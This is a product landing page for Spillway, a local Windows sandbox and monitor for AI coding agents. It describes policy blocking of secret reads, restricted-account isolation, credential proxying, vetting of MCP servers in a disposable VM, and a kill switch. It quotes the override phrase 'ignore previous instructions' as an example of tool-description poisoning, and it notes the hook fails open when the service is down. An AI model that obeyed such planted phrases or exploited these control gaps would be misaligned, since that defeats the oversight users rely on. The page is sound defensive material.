Spillway — Let AI coding agents loose on code that matters

You already trust an AI agent with your codebase.
You just can't see what it's doing with it.

Every developer running Claude Code, Cursor, or Codex on real projects knows these moments:

"It read my .env. I only noticed because I happened to be watching the terminal."

Agents read broadly by design. Your API keys, tokens, and client secrets are just files to them.

"I only run the agent on a copy of the repo."

If you need a sandbox copy to feel safe, you're not really using the agent — you're babysitting it.

"Honestly? I have no idea what it touched last session."

When something breaks two days later, there's no record to check. You debug your own agent from memory.

Not just hooks. A real sandbox, enforced by Windows itself.

Most agent-safety tools watch tool calls and hope the agent plays along. A single shell command slips right past them. Spillway layers three independent defenses — and the deepest one is the operating system.

Policy engine

Every tool call is checked against your rules in under a millisecond, before it runs. Block reads of secrets, writes to protected paths, dangerous shell patterns — including shell commands that merely mention a protected file.

> cat .env
✗ Blocked by policy: secret files
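A check like the one above could be sketched roughly as follows. This is a minimal illustration, not Spillway's actual engine: the glob list, the `Decision` type, and the `check_tool_call` function are all hypothetical names chosen for the example. It shows the idea of treating a shell command as blocked when any of its tokens merely mentions a protected file.

```python
import fnmatch
import re
from dataclasses import dataclass

# Hypothetical rule set for illustration; not Spillway's real defaults.
SECRET_GLOBS = [".env", ".env.*", "*.pem", "*.key"]

# Splits a command line into rough tokens on whitespace, quotes and operators.
TOKEN = re.compile(r"[^\s'\"|;&<>=]+")


@dataclass
class Decision:
    allowed: bool
    reason: str = ""


def _is_secret(path: str) -> bool:
    # Compare only the final path component against each glob.
    name = re.split(r"[\\/]", path)[-1]
    return any(fnmatch.fnmatch(name, glob) for glob in SECRET_GLOBS)


def check_tool_call(tool: str, argument: str) -> Decision:
    """Decide whether a tool call may run, before it runs."""
    if tool in ("read", "write"):
        candidates = [argument]
    elif tool == "shell":
        # Every token is checked, so a mere mention of a secret file blocks.
        candidates = TOKEN.findall(argument)
    else:
        candidates = []
    for candidate in candidates:
        if _is_secret(candidate):
            return Decision(False, "Blocked by policy: secret files")
    return Decision(True)
```

Under these assumptions, `check_tool_call("shell", "cat .env")` is denied while `check_tool_call("shell", "git status")` passes. Token matching of this kind is deliberately conservative: it will also block harmless commands that only name a secret file.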

OS-enforced isolation

In strict mode, the agent runs as a dedicated, restricted Windows account with real file permissions. It's not asked to behave — it physically cannot read what you didn't grant. Any command, any tool, any trick: same locked door.

> Get-Content ..\other-project\secrets.json
✗ Access is denied. (Windows, not us)

Credential protection

Your real Claude API token never enters the sandbox. The agent holds a worthless dummy; a local proxy swaps in the real credential on the way out. Even a fully compromised agent can't steal what isn't there.

sandbox token: spillway-dummy-***
real token: never inside
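The swap itself can be pictured as a small header rewrite at the proxy. The sketch below is an assumption about how such a proxy might work, not a description of Spillway's code: `DUMMY_TOKEN`, `swap_credential`, and the choice of header names are illustrative.

```python
# Placeholder value, assumed for illustration only.
DUMMY_TOKEN = "spillway-dummy-000"

# Header names assumed to carry the credential in this sketch.
AUTH_HEADERS = ("x-api-key", "authorization")


def swap_credential(headers: dict[str, str], real_token: str) -> dict[str, str]:
    """Return outbound headers with the dummy token replaced by the real one."""
    outbound = dict(headers)  # never mutate the request seen inside the sandbox
    for name, value in headers.items():
        if name.lower() in AUTH_HEADERS and DUMMY_TOKEN in value:
            outbound[name] = value.replace(DUMMY_TOKEN, real_token)
    return outbound
```

Because the real token exists only in the proxy process, anything running inside the sandbox can read its own request headers and still find nothing but the dummy value.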

Untrusted MCP servers get detonated in a throwaway VM — before they ever touch your machine.

MCP servers are packages that run with your full permissions the moment they start. Most tools, including plain Claude Code, launch them blind just to list their tools. Spillway doesn't. Before a session starts, each server is vetted inside Windows Sandbox: a disposable virtual machine with no network, no access to your files, and nothing to steal.

Screened before launch

The server's package and version are checked against a known-bad advisory list, and its config is scanned for red flags — shell pipes, encoded blobs, credential-looking values. A known-compromised version blocks the session without ever being run.

mcp: [email protected]
✗ HIGH — known-compromised version, blocked
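Static screening of this kind needs no execution at all, which a short sketch can make concrete. Everything here is hypothetical: the advisory entry, the regular expressions, and the severity assigned to each red flag are assumptions for illustration rather than Spillway's real rules.

```python
import re

# Hypothetical advisory entries: (package, version) pairs known to be bad.
ADVISORIES = {("example-mcp-server", "1.4.2")}

# Illustrative red-flag patterns for a server's launch config.
RED_FLAGS = {
    "shell pipe": re.compile(r"\|\s*(sh|bash|powershell|cmd)\b", re.I),
    "encoded blob": re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"),
    "credential-looking value": re.compile(
        r"(api[_-]?key|token|secret|password)\s*[=:]\s*\S+", re.I
    ),
}


def screen(package: str, version: str, config_text: str) -> list[tuple[str, str]]:
    """Return (severity, finding) pairs without ever running the server."""
    findings = []
    if (package, version) in ADVISORIES:
        findings.append(("HIGH", "known-compromised version"))
    for label, pattern in RED_FLAGS.items():
        if pattern.search(config_text):
            findings.append(("MEDIUM", label))
    return findings
```

A config containing `curl http://x | sh` would yield a `shell pipe` finding here, and a listed package version yields a `HIGH` finding before any process is started.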

Detonated in a disposable VM

Servers that pass screening are launched inside Windows Sandbox — networking disabled, your project and secrets never mapped in, everything wiped on close. Their tools are listed and fingerprinted where a backdoor has nothing to reach and nowhere to report to.

sandbox: no network · no files · wiped on exit
tools/list → fingerprinted safely

Scored, then gated

Every tool description is scanned for agent-manipulation attacks — "ignore previous instructions", hidden unicode, tool-shadowing names. Findings are scored High / Medium / Low: High blocks the session; anything lower, you decide with the evidence in front of you.

tool "search_docs": description contains
⚠ hidden instruction targeting the agent
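As a rough sketch of the scan-then-gate step, assuming a simplified two-check scanner: the phrase pattern, the severity levels attached to each check, and the function names are illustrative choices, not Spillway's scoring model. Hidden unicode is detected through the Unicode "Cf" (format) category, which covers invisible characters such as zero-width spaces and direction overrides.

```python
import re
import unicodedata

# Illustrative pattern for one well-known manipulation phrase.
INJECTION = re.compile(r"ignore (all )?(previous|prior) instructions", re.I)


def scan_description(text: str) -> list[tuple[str, str]]:
    """Return (severity, finding) pairs for one tool description."""
    findings = []
    if INJECTION.search(text):
        findings.append(("HIGH", "hidden instruction targeting the agent"))
    # Category "Cf" marks invisible format characters (zero-width, bidi, tags).
    if any(unicodedata.category(ch) == "Cf" for ch in text):
        findings.append(("MEDIUM", "hidden unicode"))
    return findings


def gate(findings: list[tuple[str, str]]) -> str:
    """HIGH blocks the session; anything lower is left to the user."""
    levels = {level for level, _ in findings}
    if "HIGH" in levels:
        return "block"
    return "ask" if levels else "allow"
```

With these assumptions, a clean description gates to `allow`, one containing a zero-width space gates to `ask`, and one containing "ignore previous instructions" gates to `block`.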

Windows Sandbox requires Windows Pro/Enterprise. Without it, Spillway degrades gracefully: static screening always runs and still blocks known-bad servers — and it tells you plainly which layer is active. Either way, at session time every MCP server is contained by the restricted sandbox account.

Then it tells you the whole story.

Blocking is half the job. After every session, Spillway turns the raw record into answers.

🧾

Complete session timeline

Every tool call, file change, shell command, and MCP call — timestamped, in order, kept locally. When something breaks later, you check the record instead of your memory.

💬

Interview your session (NEW)

Ask a finished session questions in plain English: "Why did you edit the payment module?" Spillway reopens the agent's own context so it answers about what it actually did.

🚦

Instant risk read (NEW)

Every session gets a verdict — Calm, Notable, or Suspicious — with plain-language reasons. A Security Spotlight surfaces exactly what was blocked, denied, or unusual.

🔒

Secrets stay secret

.env files, keys, and certificates are blocked from the agent's tools and from shell commands — and in strict mode, denied by Windows file permissions on top.

🧰

MCP supply-chain guard (NEW)

Untrusted MCP servers are vetted in a disposable VM and risk-scored before any session. Every approved tool is fingerprinted; if a server silently changes a definition, the session refuses to start until you review it.
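One plausible way to fingerprint a tool definition is to hash a canonical serialization of it, so that any silent change produces a different digest. The sketch below assumes tools are plain dictionaries with a `name` field and uses SHA-256; both choices, and the function names, are assumptions for illustration.

```python
import hashlib
import json


def fingerprint(tool: dict) -> str:
    """Hash a canonical JSON form so key order does not affect the result."""
    canonical = json.dumps(tool, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256(canonical.encode("utf-8")).hexdigest()


def changed_tools(approved: dict[str, str], current: list[dict]) -> list[str]:
    """Names of tools that are new or whose definition differs from approval."""
    return [
        tool["name"]
        for tool in current
        if approved.get(tool["name"]) != fingerprint(tool)
    ]
```

If `changed_tools` returns anything, a session would refuse to start until the listed definitions are reviewed and re-approved.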

⛔

Kill switch

One click terminates the agent and its entire process tree — even across the sandbox account boundary. Policies can pull it automatically ("stop the session if X happens").

📈

Drift & trends

Spillway learns each project's normal. A session that deletes 10× more files than usual, or suddenly calls unfamiliar tools, gets flagged — even if no rule was broken.
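A drift check of this kind can be as simple as comparing one session's count against the project's running average. This is a minimal sketch under stated assumptions: the mean as the baseline, the floor of one file, and the `is_drift` name are illustrative, and only the 10× factor comes from the text above.

```python
from statistics import mean


def is_drift(history: list[int], current: int, factor: float = 10.0) -> bool:
    """Flag a session whose count exceeds `factor` times the project's average."""
    if not history:
        return False  # no baseline yet, so nothing counts as unusual
    # Floor the baseline at 1 so a project with no deletions still has a threshold.
    baseline = max(mean(history), 1)
    return current > baseline * factor
```

For a project whose past sessions deleted 2, 3, and 4 files, a session deleting 40 is flagged and one deleting 5 is not.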

🛡️

Tamper-proof by design

The agent can't read, edit, or delete Spillway's own rules and audit trail — that protection is built in and can't be switched off by any policy.

🏠

100% local

No cloud, no account, no telemetry. The background service makes zero outbound connections. Your code and your session history never leave your machine.

Not a mockup. This is a real session.

An agent was told to explore a project. It tried to read two .env files — one inside the project, one in a different folder entirely. Here's what that looks like.

[Screenshot: Spillway session report] **The session report.** Two `.env` reads blocked by policy, the session flagged *Suspicious* with plain-language reasons, every tool call counted, and the whole thing exportable as Markdown or JSON.

[Screenshot: Spillway dashboard] **The dashboard.** Every recent session with its risk read at a glance: *Calm* sessions stay quiet, the *Suspicious* one shows its 2 blocks, and trend charts compare each session against this project's normal activity.

Three steps. No workflow changes.

Pick a project

Open Spillway, choose the folder, and set what's off-limits. Sensible defaults (.env, keys, certs) are on from the first second.

Start a protected session

One click launches Claude Code exactly as you know it — same terminal, same speed — wrapped in Spillway's policy layer, or the full OS sandbox in strict mode.

Work, then read the story

Code as usual. When the session ends you get the timeline, the risk read, and a report — and you can ask the session itself what happened and why.

Questions developers actually ask

Does it slow Claude Code down?

No. The policy check runs in memory in under a millisecond, and the whole hook round-trip is budgeted under 100 ms per tool call. It also fails open by design: if Spillway's service is ever slow or down, your agent keeps working. You lose protection, never your terminal.

Which agents does it support?

Claude Code today, end to end. Cursor, Codex, and Gemini CLI are on the roadmap — the enforcement layer (OS sandbox, credential proxy, file watcher) is agent-agnostic by design.

Windows only?

Early access is Windows 10/11. macOS is next. Leave your email and tell us your platform; it directly decides what we build first.

Can the agent just turn Spillway off?

No. The agent can't touch Spillway's rules, database, or audit trail — that's blocked at the policy layer and, in strict mode, by Windows file permissions the agent's account simply doesn't have. Protection the protected thing can delete isn't protection.

What about malicious MCP servers?

This is the blind spot almost nobody covers: an MCP server is code that runs with your full permissions the instant it starts, and most tools launch it just to read its tool list. Spillway screens each untrusted server against known-bad versions first, then launches it inside a disposable Windows Sandbox VM (no network, no files) to fingerprint its tools and scan for poisoned descriptions. High-risk findings block the session. At session time the server runs inside the restricted account anyway, so even a payload that behaved during vetting stays contained.

Do you see my code or my prompts?

We can't. There is no server side. Spillway stores event metadata (which file, which tool, when — never file contents) in a local database on your machine, with secret-pattern redaction on top.
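To illustrate what secret-pattern redaction can mean for stored metadata such as a logged shell command, here is a minimal sketch. The pattern and the `redact` function are assumptions for the example; Spillway's actual patterns are not documented here.

```python
import re

# Illustrative pattern: a secret-looking key, a separator, then its value.
SECRET_PATTERN = re.compile(
    r"\b(api[_-]?key|token|secret|password)(\s*[=:]\s*)(\S+)", re.I
)


def redact(text: str) -> str:
    """Replace the value of any secret-looking assignment before storing."""
    return SECRET_PATTERN.sub(r"\1\2[REDACTED]", text)
```

Under this pattern, `token=abc123` is stored as `token=[REDACTED]`, while a command with no secret-looking assignment is stored unchanged.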

What will it cost?

Free during early access. Paid plans will land in the range of other individual developer tools — early-access users lock in a founding discount, permanently.

All the power. None of the flood.

A spillway is how a dam survives its own power: enormous force passes through on an engineered path, and when something goes wrong, the emergency gate dumps the load before disaster. That's Spillway for your AI agent: every action flows through a channel you control — full speed while it behaves, a hard stop the instant it doesn't.

10 early-access seats per batch · Windows · free while in early access

Built by a developer who didn't want his code in someone else's cloud.
